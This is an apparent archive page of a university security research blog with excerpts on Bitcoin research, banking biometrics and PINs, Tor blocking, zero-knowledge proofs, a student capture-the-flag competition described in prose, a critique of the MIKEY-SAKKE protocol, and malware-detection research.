Bentham’s Gaze

Bitcoin workshop at Financial Crypto 2016

On 26 February 2016 the 3rd workshop on Bitcoin and Blockchain Research in association with Financial Cryptography 2016 took place in Barbados. This workshop aims to bring together researchers interested in cryptocurrencies to present their latest work and discuss together the future of Bitcoin. The program chairs were Sarah Meiklejohn from University College London and Jeremy Clark from Concordia University. The themes addressed during the workshop included blockchain architecture, anonymity, and proof of work alternatives. This event was also a great way for researchers with similar interests to network and share their ideas.

The workshop consisted of 2 keynotes and 4 plenary sessions: Bitcoin network analysis, Enhancing Bitcoin, Ethereum, and Blockchain Architecture.

Nathaniel Popper kicked off the day with a keynote presentation. Nathaniel is a journalist from the New York Times and author of the book ‘Digital Gold: The Untold story of Bitcoin’. He went on to speak about the history of Bitcoin covering Silk Road, Mt Gox, as well as the role of governments.

Then the first session, about Bitcoin network analysis, included two talks. The first one, Stressing Out: Bitcoin Stress Testing, by Khaled Baqer et al., was about DoS attack on Bitcoin, and was presented by Ross Anderson due to visa issues. The second one was Why buy when you can rent? Bribery attacks on Bitcoin-style consensus, by Joseph Bonneau on bribery attacks and cloud mining.

The next session, Enhancing Bitcoin, started with a talk by Ethan Heilman, Blindly Signed Contracts: Anonymous On-Blockchain and Off-Blockchain Bitcoin Transactions, on how to enhance Bitcoin anonymity. Then Mathieu Turuani gave a talk on Automated Verification of Electrum wallet, followed by Aggelos Kiayias on Proof of Proof of Work. Today many light-weight clients use SPV verification instead of full verification. Is it possible to have an even lighter verification? They introduce a modification of the Bitcoin blockchain protocol with sublinear complexity in the length of the chain.

Continue reading Bitcoin workshop at Financial Crypto 2016

Biometrics for payments

HSBC and First Direct recently announced that they are introducing fingerprint and voice recognition authentication for customers of online and telephone banking. In my own research, I first found nearly 20 years ago that people who have a multitude of passwords and PINs cannot manage them as security experts want them to. As the number of digital devices and services we use has increased rapidly, managing dozens of login details has become a headache for most people. We recently reported that most bank customers juggle multiple PINs, and are unable to follow the rules that banks set in their contracts. Our research also found that many people dislike the 2-factor token solutions that are currently used by many UK banks.

Passwords as most people use them today are not particularly secure. Attackers can easily attempt to collect information on individuals, using leaks of password files not properly protected by some websites, “phishing” scams or malware planted on people’s computers. Reusing a banking password on other websites – something that many of us do because we cannot remember dozens of different passwords – is also a significant security risk.

The introduction of fingerprint recognition on smartphones – such as the iPhone – has delighted many users fed up with entering their PINs dozens of times a day. So the announcement that HSBC and other banks will be able to use the fingerprint sensor on their smartphones for banking means that millions of consumers will finally be able to end their battle with passwords and PINs and use biometrics instead. Other services people access from their smartphones are likely to follow suit. And given the negative impact that cumbersome authentication via passwords and PINs has on staff productivity and morale in many organisations, we can expect to see biometrics deployed in work contexts, too.

But while biometrics – unlike passwords – do not require mental gymnastics from users, there are different usability challenges. Leveraging the biometric from the modality of interaction – e.g. voice recognition phone-based interactions – makes authentication an easy task, but it will work considerably better in quiet environments than noisy ones – such as a train stations or with many people talking in the background. As many smartphone users have learnt, fingerprint sensors have a hard time recognising cold and wet fingers. And – as we report in a paper presented at IEEE Identity, Security and Behavior Analysis last week – privacy concerns mean some users ‘don’t like putting their face on the Internet’. Biometrics can’t come soon enough for most users, but there is still a lot of design and testing work to be done to make biometrics work for different interaction, physical and social contexts.

Privately gathering statistics and training simple models

Last week, Luca Melis has presented our NDSS16 paper “Efficient Private Statistics with Succinct Sketches“, where we show how to privately and efficiently aggregate data from many sources and/or large streams, and then use the aggregate to extract useful statistics and train simple machine learning models.

Our work is motivated by a few “real-world” problems:

Media broadcasting providers like the BBC (with which we collaborate) routinely collect data from their users about videos they have watched (e.g., on BBC’s iPlayer) in order to provide users with personalized suggestions for other videos, based on recommender systems like Item k-Nearest Neighbor (ItemKNN)
Urban and transport planning committees, such as London’s mass transport operators, need to gather statistics about people’s movements and commutes, e.g., to improve transportation services and predict near-future trends and anomalies on a short notice.
Network infrastructures like the Tor network need to gather traffic statistics, like the number of, and traffic generated by, Tor hidden services, in order to tune design decisions as well as convince their founders the infrastructure is used for the intended purposes.

While different in their application, these examples exhibit a common feature: the need for providers to aggregate large amounts of sensitive information from large numbers of data sources, in order to produce aggregate statistics and possibly train machine learning models.

Prior work has proposed a few cryptographic tools for privacy-enhanced computation that could be use for private collection of statistics. For instance, by relying on homomorphic encryption and/or secret sharing, an untrusted aggregator can receive encrypted readings from users and only decrypt their sum. However, these require users to perform a number of cryptographic operations, and transmit a number of ciphertexts, linear in the size of their inputs, which makes it impractical for the scenarios discussed above, whereby inputs to be aggregated are quite large. For instance, if we use ItemKNN for the recommendations, we would need to aggregate values for “co-views” (i.e., videos that have been watched by the same user) of hundreds of videos at the time – thus, each user would have to encrypt and transfer hundreds of thousands of values at the time.

Scaling private aggregation

We tackle the problem from two points of view: an “algorithmic” one and a “system” one. That is, we have worked both on the design of the necessary cryptographic and data structure tools, as well as on making it easy for application developers to easily support these tools in web and mobile applications.

Our intuition is that, in many scenarios, it might be enough to collect estimates of statistics and trade off an upper-bounded error with significant efficiency gains. For instance, the accuracy of a recommender system might not be really affected if the statistics we need to train the model are approximated with a small error.

Continue reading Privately gathering statistics and training simple models

“Do you see what I see?” ask Tor users, as a large number of websites reject them but accept non-Tor users

If you use an anonymity network such as Tor on a regular basis, you are probably familiar with various annoyances in your web browsing experience, ranging from pages saying “Access denied” to having to solve CAPTCHAs before continuing. Interestingly, these hurdles disappear if the same website is accessed without Tor. The growing trend of websites extending this kind of “differential treatment” to anonymous users undermines Tor’s overall utility, and adds a new dimension to the traditional threats to Tor (attacks on user privacy, or governments blocking access to Tor). There is plenty of anecdotal evidence about Tor users experiencing difficulties in browsing the web, for example the user-reported catalog of services blocking Tor. However, we don’t have sufficient detail about the problem to answer deeper questions like: how prevalent is differential treatment of Tor on the web; are there any centralized players with Tor-unfriendly policies that have a magnified effect on the browsing experience of Tor users; can we identify patterns in where these Tor-unfriendly websites are hosted (or located), and so forth.

Today we present our paper on this topic: “Do You See What I See? Differential Treatment of Anonymous Users” at the Network and Distributed System Security Symposium (NDSS). Together with researchers from the University of Cambridge, University College London, University of California, Berkeley and International Computer Science Institute (Berkeley), we conducted comprehensive network measurements to shed light on websites that block Tor. At the network layer, we scanned the entire IPv4 address space on port 80 from Tor exit nodes. At the application layer, we fetch the homepage from the most popular 1,000 websites (according to Alexa) from all Tor exit nodes. We compare these measurements with a baseline from non-Tor control measurements, and uncover significant evidence of Tor blocking. We estimate that at least 1.3 million IP addresses that would otherwise allow a TCP handshake on port 80 block the handshake if it originates from a Tor exit node. We also show that at least 3.67% of the most popular 1,000 websites block Tor users at the application layer.

Continue reading “Do you see what I see?” ask Tor users, as a large number of websites reject them but accept non-Tor users

Are Payment Card Contracts Unfair?

While US bank customers are almost completely protected against fraudulent transactions, in Europe banks are entitled to refuse to reimburse victims of fraud under certain circumstances. The EU Payment Services Directive (PSD) is supposed to protect customers but if the bank can show that the customer has been “grossly negligent” in following the terms and conditions associated with their account then the PSD permits the bank to pass the cost of any fraud on to the customer. The bank doesn’t have to show how the fraud happened, just that the most likely explanation for the fraud is that the customer failed to follow one of the rules set out by the bank on how to protect the account. To be certain of obtaining a refund, a customer must be able to show that he or she complied with every security-related clause of the terms and conditions, or show that the fraud was a result of a flaw in the bank’s security.

The bank terms and conditions, and how customers comply with them, are therefore of critical importance for consumer protection. We set out to answer the question: are these terms and conditions fair, taking into account how customers use their banking facilities? We focussed on ATM payments and in particular how customers manage PINs because ATM fraud losses are paid for by the banks and not retailers, so there is more incentive for the bank to pass losses on to the customer. In our paper – “Are Payment Card Contracts Unfair?” – published at Financial Cryptography 2016 we show that customers have too many PINs to remember them unaided and therefore it is unrealistic to expect customers to comply with all the rules banks set: to choose unguessable PINs, not write them down, and not use them elsewhere (even with different banks). We find that, as a result of these unrealistic expectations, customers do indeed make use of coping mechanisms which reduce security and violate terms and conditions, which puts them in a weak position should they be the victim of fraud.

We surveyed 241 UK bank customers and found that 19% of customers have four or more PINs and 48% of PINs are used at most once a month. As a result of interference (one memory being confused with another) and forgetting over time (if a memory is not exercised frequently it will be lost) it is infeasible for typical customers to remember all their bank PINs unaided. It is therefore inevitable that customers forget PINs (a quarter of our participants had forgot a 4-digit PIN at least once) and take steps to help them recall PINs. Of our participants, 33% recorded their PIN (most commonly in a mobile phone, notebook or diary) and 23% re-used their PIN elsewhere (most commonly to unlock their mobile phone). Both of these coping mechanisms would leave customers at risk of being found liable for fraud.

Customers also use the same PIN on several cards to reduce the burden of remembering PINs – 16% of our participants stated they used this technique, with the same PIN being used on up to 9 cards. Because each card allows the criminal 6 guesses at a PIN (3 on the card itself, and 3 at an ATM) this gives criminals an excellent opportunity to guess PINs and again leave the customer responsible for the losses. Such attacks are made easier by the fact that customers can change their PIN to one which is easier to remember, but also probably easier for criminals to guess (13% of our participants used a mnemonic, most commonly deriving the PIN from a specific date). Bonneau et al. studied in more detail exactly how bank customers select PINs.

Finally we found that PINs are regularly shared with other people, most commonly with a spouse or partner (32% of our participants). Again this violates bank terms and conditions and so puts customers at risk of being held liable for fraud.

Holding customers liable for not being able to follow unrealistic, vague and contradictory advice is grossly unfair to fraud victims. The Payment Services Directive is being revised, and in our submission to the consultation by the European Banking Authority we ask that banks only be permitted to pass fraud losses on to customers if they use authentication mechanisms which are feasible to use without undue effort, given the context of how people actually use banking facilities in normal life. Alternatively, regulators could adopt the tried and tested US model of strong consumer protection, and allow banks to manage risks through fraud detection. The increased trust from this approach might increase transaction volumes and profit for the industry overall.

“Are Payment Card Contracts Unfair?” by Steven J. Murdoch, Ingolf Becker, Ruba Abu-Salma, Ross Anderson, Nicholas Bohm, Alice Hutchings, M. Angela Sasse, and Gianluca Stringhini will be presented at Financial Cryptography and Data Security, Barbados, 22–26 February 2016.

Jens Groth – Non-interactive zero knowledge proofs, efficient enough to be used in practice

The UCL information security group’s Jens Groth, a cryptographer, is one of 17 UCL researchers who have been awarded a Starting Grant by the European Research Council. The five-year grant will fund his work on the cryptographic building block known as “zero-knowledge proofs”, a widely applicable technique that underpins both security and trust. ERC Starting Grants are intended to support up-and-coming research leaders who are beginning to set up a research team and conduct independent research. Groth’s focus is on making zero- knowledge proofs more efficient so that they can become cheap enough to become a commonly used, standard security technology. Groth is also the recipient of a second grant from the Engineering and Physical Sciences Research Council to fund his work on another related topic, structure-preserving pairing-based cryptography.

https://www.youtube.com/watch?v=1XIekTniX00

“My line of thinking,” says Groth, “is that there’s been a lot of research into zero-knowledge proofs, but I don’t know of any groups taking entire systems from theory through to very practical implementations. I am hoping to build a group that will cover this entire span, and by covering it thoroughly get some very significant gains in efficiency.” Covering that entire spectrum from the purely abstract to the built system is important, he says, because “Practice can influence theory and give us some insight into what we should be looking at. Also, when you start implementing things, lots of surprising discoveries can come up.”

Unlike other types of cryptographic tools, such as public key cryptography, used in such widely used mass-market applications as SSL (used to secure data passed over the Web while in transit), Groth notes that zero-knowledge proofs are more likely to be a behind-the-scenes technology that end users will never touch directly.

“It will be hidden inside the system,” he says. “The main properties we want are completeness, soundness – and zero-knowledge.” Completeness means the prover can convince the verifier when a statement is true. Soundness means the prover cannot convince the verifier when the statement is false. Finally, zero-knowledge means that there is no leakage of information even if the prover is interacting with a fraudulent verifier.

Continue reading Jens Groth – Non-interactive zero knowledge proofs, efficient enough to be used in practice

Our contributions to the UK Distributed Ledger Technology report

The UK Government Office for Science, has published its report on “Distributed ledger technology: beyond block chain” to which UCL’s Sarah Meiklejohn, Angela Sasse and myself (George Danezis) contributed parts of the security and privacy material. The review, looks largely at economic, innovation and social aspects of these technologies. Our part discusses potential threats to ledgers, as well as opportunities to build robust security systems using ledgers (Certificate Transparency & CONIKS), and overcome privacy challenges, including a mention of the z.cash technology.

You can listen to the podcast interview Sarah gave on the report’s use cases, recommendations, but also more broadly future research directions for distributed ledgers, such as better privacy protection.

In terms of recommendation, I personally welcome the call for the Government Digital Services, and other innovation bodies to building capacity around distributed ledger technologies. The call for more research for efficient and secure ledgers (and the specific mention of cryptography research) is also a good idea, and an obvious need. When it comes to the specific security and privacy recommendation, it simply calls for standards to be established and followed. Sadly this is mildly vague: a standards based approach to designing secure and privacy-friendly systems has not led to major successes. Instead openness in the design, a clear focus on key end-to-end security properties, and the involvement of a wide community of experts might be more productive (and less susceptible to subversion).

The report is well timed: our paper on “Centrally Banked Crypto-Currencies” will be presented in February at a leading security conference, NDSS 2016, by Sarah Meiklejohn, largely inspired by the research agenda published by the Bank of England. It provides some answers to the problems of scalability and eco-friendliness of current proof-of-work based ledger design.

First UCL team competes in the International Capture The Flag competition

Team THOR, UCL’s Capture the Flag (CTF) team, took part in its first CTF competition – the UCSB iCTF, on the 4th December 2015. The team comprised of students from the computer science department – Tom Sigler, Chris Park, Jason Papapanagiotakis, Azeem Ilyas, Salman Khalifa, Luke Roberts, Haran Anand, Alexis Enston, Austin Chamberlain, Jaromir Latal, Enrico Mariconti, and Razvan Ragazan. Through Gianluca Stringhini’s hacking seminars and our own experience, we were eager to test our ability to identify, exploit and patch application vulnerabilities.

The THOR team in action

The CTF competition style was “attack and defence” with a slight twist – each participating team had to write a vulnerable application. We were provided with a Linux virtual machine containing all of the applications which we hosted on a locally running server. This server connected to the organiser’s network over a virtual private network (VPN). During the competition, the organiser regularly polled our server to make sure each of the applications were running and whether or not they still had a security vulnerability. We were scored on 3 criteria: how many applications were up and running (and whether or not the vulnerabilities had been patched), how many flags we had managed to obtain through exploiting vulnerabilities and how close our submitted application was to the median in terms of being vulnerable, but not too vulnerable.

The application had to be “balanced” in terms of security i.e. if it was too easy or too difficult to exploit then points would be deducted. Fortunately, the organisers provided sample applications which gave us an excellent starting point. One of the sample applications was a “notes” service written in PHP – it enabled a note (which represented the flag) to be saved against a flag ID with a password. The note could be retrieved by supplying the flag ID and password, but a vulnerable CGI script enabled the note to be retrieved without a password! We customised this application by removing the CGI script (this vulnerability was very easy to identify and exploit) and changing the note insertion code so that a specially crafted token (a hex-encoded Epoch timestamp) was added next to each flag ID, password and note entry. A vulnerability was then introduced whereby note retrieval would be a two-step process – first the flag ID and password would be specified, then if the password was valid, the token would be retrieved and used in combination with the flag ID to retrieve the note. The first step of the process could be bypassed by brute-forcing the token and avoiding the password verification phase. We kept our fingers crossed that this would be exploitable by the other teams, but not too easily!

Attacking involved analysing the various applications written by the other teams for vulnerabilities. As soon as a vulnerability had been identified, we had to write some code to perform the exploit and retrieve the flag for that application. The flag served as evidence that we had successfully exploited an application. To maximise attack points, we had to run the exploit against each team’s server and submit the flags to the organiser every few minutes. Defence involved ensuring that the applications were up and running, keeping the server online and ideally patching any vulnerabilities identified in our copies of the applications.

The competition started at 5pm – we were online with our server and applications shortly afterwards. Fueled by adrenaline, caffeine, and immense enthusiasm, we chose several applications to focus our initial efforts on and got cracking!

A good portion of the applications were web applications written in PHP. This was great news as we had focused on web application vulnerabilities during the hacking seminars. We also identified applications written in Python, Java, C and Bash. Some of them were imaginative and amusing – a dating service for monkeys written in PHP, a pizza order and delivery service written in PHP and a command-line dungeon game written in C.

We managed to exploit and patch an ATM machine application through a SQL injection vulnerability (the same security vulnerability involved in the recent TalkTalk and vTech data breaches). One of the Python applications used a “pickle” function which was exploited to enable arbitrary code execution. A second Python application was vulnerable to a path-traversal bug which enabled flags to be retrieved from other user’s directories. We also were on the cusp of exploiting a buffer-overflow vulnerability in a C application, but ran out of time.

The competition ran for 8 hours and at the end, THOR ranked 14th out of 35. Given that it was THOR’s first time participating in a CTF, being the only team to represent the UK and being up against experienced teams, we felt that it was a great result! We had a huge amount of fun taking part and working as a team, so much so, that we are planning to take part in more CTF competitions in the future! Many thanks again to Gianluca, the organisers and all who participated. Go THOR!

Insecure by design: protocols for encrypted phone calls

The MIKEY-SAKKE protocol is being promoted by the UK government as a better way to secure phone calls. The reality is that MIKEY-SAKKE is designed to offer minimal security while allowing undetectable mass surveillance, through the introduction a backdoor based around mandatory key-escrow. This weakness has implications which go further than just the security of phone calls.

The current state of security for phone calls leaves a lot to be desired. Land-line calls are almost entirely unencrypted, and cellphone calls are also unencrypted except for the radio link between the handset and the phone network. While the latest cryptography standards for cellphones (3G and 4G) are reasonably strong it is possible to force a phone to fall back to older standards with easy-to-break cryptography, if any. The vast majority of phones will not reveal to their user whether such an attack is under way.

The only reason that eavesdropping on land-line calls is not commonplace is that getting access to the closed phone networks is not as easy compared to the more open Internet, and cellphone cryptography designers relied on the equipment necessary to intercept the radio link being only affordable by well-funded government intelligence agencies, and not by criminals or for corporate espionage. That might have been true in the past but it certainly no longer the case with the necessary equipment now available for $1,500. Governments, companies and individuals are increasingly looking for better security.

A second driver for better phone call encryption is the convergence of Internet and phone networks. The LTE (Long-Term Evolution) 4G cellphone standard – under development by the 3rd Generation Partnership Project (3GPP) – carries voice calls over IP packets, and desktop phones in companies are increasingly carrying voice over IP (VoIP) too. Because voice calls may travel over the Internet, whatever security was offered by the closed phone networks is gone and so other security mechanisms are needed.

Like Internet data encryption, voice encryption can broadly be categorised as either link encryption, where each intermediary may encrypt data before passing it onto the next, or end-to-end encryption, where communications are encrypted such that only the legitimate end-points can have access to the unencrypted communication. End-to-end encryption is preferable for security because it avoids intermediaries being able to eavesdrop on communications and gives the end-points assurance that communications will indeed be encrypted all the way to their other communication partner.

Current cellphone encryption standards are link encryption: the phone encrypts calls between it and the phone network using cryptographic keys stored on the Subscriber Identity Module (SIM). Within the phone network, encryption may also be present but the network provider still has access to unencrypted data, so even ignoring the vulnerability to fall-back attacks on the radio link, the network providers and their suppliers are weak points that are tempting for attackers to compromise. Recent examples of such attacks include the compromise of the phone networks of Vodafone in Greece (2004) and Belgacom in Belgium (2012), and the SIM card supplier Gemalto in France (2010). The identity of the Vodafone Greece hacker remains unknown (though the NSA is suspected) but the attacks against Belgacom and Gemalto were carried out by the UK signals intelligence agency – GCHQ – and only publicly revealed from the Snowden leaks, so it is quite possible there are others attacks which remain hidden.

Email is typically only secured by link encryption, if at all, with HTTPS encrypting access to most webmail and Transport Layer Security (TLS) sometimes encrypting other communication protocols that carry email (SMTP, IMAP and POP). Again, the fact that intermediaries have access to plaintext creates a vulnerability, as demonstrated by the 2009 hack of Google’s Gmail likely originating from China. End-to-end email encryption is possible using the OpenPGP or S/MIME protocols but their use is not common, primarily due to their poor usability, which in turn is at least partially a result of having to stay compatible with older insecure email standards.

In contrast, instant messaging applications had more opportunity to start with a clean-slate (because there is no expectation of compatibility among different networks) and so this is where much innovation in terms of end-to-end security has taken place. Secure voice communication however has had less attention than instant messaging so in the remainder of the article we shall examine what should be expected of a secure voice communication system, and in particular see how one of the latest and up-coming protocols, MIKEY-SAKKE, which comes with UK government backing, meets these criteria.

MIKEY-SAKKE and Secure Chorus

MIKEY-SAKKE is the security protocol behind the Secure Chorus voice (and also video) encryption standard, commissioned and designed by GCHQ through their information security arm, CESG. GCHQ have announced that they will only certify voice encryption products through their Commercial Product Assurance (CPA) security evaluation scheme if the product implements MIKEY-SAKKE and Secure Chorus. As a result, MIKEY-SAKKE has a monopoly over the vast majority of classified UK government voice communication and so companies developing secure voice communication systems must implement it in order to gain access to this market. GCHQ can also set requirements of what products are used in the public sector and as well as for companies operating critical national infrastructure.

UK government standards are also influential in guiding purchase decisions outside of government and we are already seeing MIKEY-SAKKE marketed commercially as “government-grade security” and capitalising on their approval for use in the UK government. For this reason, and also because GCHQ have provided implementers a free open source library to make it easier and cheaper to deploy Secure Chorus, we can expect wide use MIKEY-SAKKE in industry and possibly among the public. It is therefore important to consider whether MIKEY-SAKKE is appropriate for wide-scale use. For the reasons outlined in the remainder of this article, the answer is no – MIKEY-SAKKE is designed to offer minimal security while allowing undetectable mass surveillance though key-escrow, not to provide effective security.

Continue reading Insecure by design: protocols for encrypted phone calls

ACE-CSR opening event 2015/16: talks on malware, location privacy and wiretap law

The opening event for the UCL Academic Centre of Excellence for Cyber Security Research in the 2015–2016 academic term featured three speakers: Earl Barr, whose work on approximating program equivalence has won several ACM distinguished paper awards; Mirco Musolesi from the Department of Geography, whose background includes a degree in computer science and an interest in analysing myriad types of data while protecting privacy; and Susan Landau, a professor at Worcester Polytechnic Institute and a visiting professor at UCL and an expert on cyber security policy whose books include Privacy On the Line: the Politics of Wiretapping and Encryption (with Whitfield Diffie) and Surveillance or Security? The Risks Posed by New Wiretapping Technologies.

Detecting malware and IP theft through program similarity

Earl Barr is a member of the software systems engineering group and the Centre for Research on Evolution, Search, and Testing. His talk outlined his work using program similarity to determine whether two arbitrary programs have the same behaviour in two areas relevant to cyber security: malware and intellectual property theft in binaries (that is, code reused in violation of its licence).

Barr began by outlining his work on detecting malware, comparing the problem to that facing airport security personnel trying to find a terrorist among millions of passengers. The work begins with profiling: collect two zoos, and then ask if the program under consideration is more likely to belong to the benign zoo or the malware zoo.

Rather than study the structure of the binary, Barr works by viewing the program as strings of 0s and 1s, which may not coincide with the program’s instructions, and using information theory to create a measure of dissimilarity, the normalised compression distance (NCD). The NCD serves as an approximation of the Kolmogorov Complexity, a mathematical measure of the complexity of the shortest description of an object, which is then normalised using a compression algorithm that ignores the details of the instruction set architecture for which the binary is written.

Using these techniques to analyse a malware zoo collected from sources such as Virus Watch, Barr was able to achieve a 95.7% accuracy rate. He believes that although this technique isn’t suitable for contemporary desktop anti-virus software, it opens a new front in the malware detection arms race. Still, Barr is aware that malware writers will rapidly develop countermeasures and his group is already investigating counter-countermeasures.

Malware writers have three avenues for blocking detection: injecting new content that looks benign; encryption; and obfuscation. Adding new content threatens the malware’s viability: raising the NCD by 50% requires doubling the size of the malware. Encryption can be used against the malware writer: applying a language model across the program reveals a distinctive saw-toothed pattern of regions with low surprise and low entropy alternating with regions of high surprise and high entropy (that is, regions with ciphertext). Obfuscation is still under study: the group is using three obfuscation engines available for Java and applying them repeatedly to Java malware. Measuring the NCD after each application shows that after 100 iterations the NCD approaches 1 (that is, the two items being compared are dissimilar), but that two of the three engines make errors after 200 applications. Unfortunately for malware writers, this technique also causes the program to grow in size. The cost of obfuscation to malware writers may therefore be greater than that imposed upon white hats.

Continue reading ACE-CSR opening event 2015/16: talks on malware, location privacy and wiretap law